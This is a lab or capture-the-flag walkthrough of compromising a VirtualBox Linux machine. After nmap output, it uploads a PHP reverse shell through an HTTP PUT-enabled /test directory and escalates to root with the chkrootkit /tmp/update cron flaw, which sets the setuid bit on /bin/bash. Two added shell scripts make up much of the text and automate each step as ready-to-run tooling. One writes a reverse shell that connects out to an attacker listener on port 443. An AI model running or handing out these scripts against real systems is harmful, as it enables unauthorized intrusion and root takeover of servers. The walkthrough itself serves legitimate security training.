Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:A3:0E:F4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Uptime guess: 0.016 days (since Wed Oct 2 17:53:41 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 10.0.0.17
Nmap shows only two open ports, SSH (22) and HTTP (80). Browsing the web root turned up nothing useful.

dirsearch then found a /test directory with directory listing enabled, and the PUT method was allowed there. Note that the scan above only advertises GET, HEAD, POST and OPTIONS for the root, so method support has to be checked per directory, not just on /. I intercepted a request in Burp Suite, changed it to a PUT, and uploaded a PHP reverse shell. The listener had to be on port 443: the box blocks outbound connections to other ports, so a shell calling back on anything else never connects.
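The same upload done from the command line instead of Burp, as an added example that is not part of the original writeup. It assumes the target is http://10.0.0.17 (the host from the scan) and that the attacker listens on 10.0.0.1:443 (hypothetical address; the port is the one the box lets out). It first confirms via OPTIONS that PUT is really allowed on /test/ before uploading, then checks the PUT response code.

```shell
#!/bin/bash
# Added example: verify PUT on /test/, upload a PHP reverse shell, report status.
# TARGET is the scanned host; LHOST/LPORT are the attacker's listener (assumed).
TARGET="${TARGET:-http://10.0.0.17}"
LHOST="${LHOST:-10.0.0.1}"
LPORT="${LPORT:-443}"

# Return 0 if an Allow: header value (e.g. "GET, HEAD, POST, OPTIONS") lists PUT.
allow_has_put() {
    printf '%s\n' "$1" | tr 'a-z' 'A-Z' | tr -d ' \r' | tr ',' '\n' | grep -qx 'PUT'
}

# Send OPTIONS and print the value of the Allow: header for a URL.
allowed_methods() {
    curl -s -i -X OPTIONS "$1" | awk -F': ' 'tolower($1)=="allow"{print $2}' | tr -d '\r'
}

# Write a minimal PHP reverse shell (connect back, hand the socket to /bin/sh) to $1.
make_shell() {
    cat > "$1" <<EOF
<?php
\$sock = fsockopen("$LHOST", $LPORT);
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
EOF
}

# upload <localfile> <url>: PUT the file and succeed only on a 2xx that means "stored".
upload() {
    local code
    code=$(curl -s -o /dev/null -w '%{http_code}' -X PUT --data-binary "@$1" "$2")
    case "$code" in
        200|201|204) return 0 ;;
        *) echo "PUT failed: HTTP $code" >&2; return 1 ;;
    esac
}

main() {
    local methods
    methods=$(allowed_methods "$TARGET/test/")
    allow_has_put "$methods" || { echo "PUT not allowed on /test/: $methods" >&2; exit 1; }
    make_shell /tmp/rs.php
    upload /tmp/rs.php "$TARGET/test/rs.php" || exit 1
    echo "uploaded; start the listener (nc -lvnp $LPORT) and fetch $TARGET/test/rs.php"
}

# Run with: ./put_shell.sh run   (functions can also be sourced individually)
if [ "${1:-}" = "run" ]; then
    main
fi
```

The OPTIONS check is what tells the two directories apart: / answers with the four methods seen in the scan, /test/ with a list that includes PUT. Start the listener before fetching the uploaded file, and keep it on 443, since that is the only egress port the box allows.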
Once in the shell as www-data, I looked for the usual privilege-escalation vectors and found chkrootkit running from a root cron job. That makes escalation easy: old chkrootkit (0.49 and earlier, CVE-2014-0476) executes /tmp/update as root if that file exists, so anyone who can write to /tmp gets a command run as root the next time the job fires.

I dropped the payload in /tmp. It also has to be executable, otherwise chkrootkit's attempt to run it fails (and it will not work at all if /tmp is mounted noexec):

echo 'chmod +s /bin/bash' > /tmp/update
chmod +x /tmp/update

After the next cron run, /bin/bash carries the setuid bit:
www-data@ubuntu:/tmp$ ls -la /bin/bash
-rwsr-sr-x 1 root root 920788 Mar 28 2013 /bin/bash
The s in the owner and group execute positions shows /bin/bash is now setuid (and setgid) root. Bash drops an effective uid that differs from the real uid unless started with -p, so run it that way:
www-data@ubuntu:/tmp$ /bin/bash -p
bash-4.2# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
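The escalation above as a small script, an added example that is not part of the original writeup. It stages the /tmp/update payload with the exec bit set, then polls for the setuid bit on /bin/bash rather than guessing when cron has fired. The payload path is a parameter so the staging step can be exercised anywhere; on the target it is /tmp/update, the path chkrootkit executes.

```shell
#!/bin/bash
# Added example: chkrootkit /tmp/update privilege escalation, with checks.
# Assumes chkrootkit 0.49 or older runs from root's crontab, as on this box.

# stage_payload [path]: write the script chkrootkit will run as root and make it
# executable. Without the exec bit chkrootkit cannot run it. Returns 0 on success.
stage_payload() {
    local path="${1:-/tmp/update}"
    printf '%s\n' '#!/bin/sh' 'chmod +s /bin/bash' > "$path" || return 1
    chmod 755 "$path" || return 1
    [ -x "$path" ]
}

# bash_is_suid [binary]: 0 if the setuid bit is set on the file.
bash_is_suid() {
    [ -u "${1:-/bin/bash}" ]
}

# wait_for_suid [timeout_seconds]: poll until /bin/bash is setuid or time runs out.
wait_for_suid() {
    local timeout="${1:-300}" elapsed=0
    while ! bash_is_suid /bin/bash; do
        [ "$elapsed" -ge "$timeout" ] && return 1
        sleep 5
        elapsed=$((elapsed + 5))
    done
    return 0
}

# Run with: ./chkrootkit_privesc.sh run
if [ "${1:-}" = "run" ]; then
    stage_payload /tmp/update || { echo "could not stage /tmp/update" >&2; exit 1; }
    echo "payload staged; waiting for the chkrootkit cron job"
    wait_for_suid 300 || { echo "/bin/bash still not setuid after 5 min" >&2; exit 1; }
    ls -la /bin/bash
    exec /bin/bash -p   # -p keeps euid=0 instead of dropping to www-data
fi
```

Checking for the setuid bit with `[ -u ]` is the same thing the `ls -la` output above shows, just in a form a script can loop on. If the bit never appears, the usual reasons are a noexec /tmp or a chkrootkit version that has the fix, and a different vector is needed.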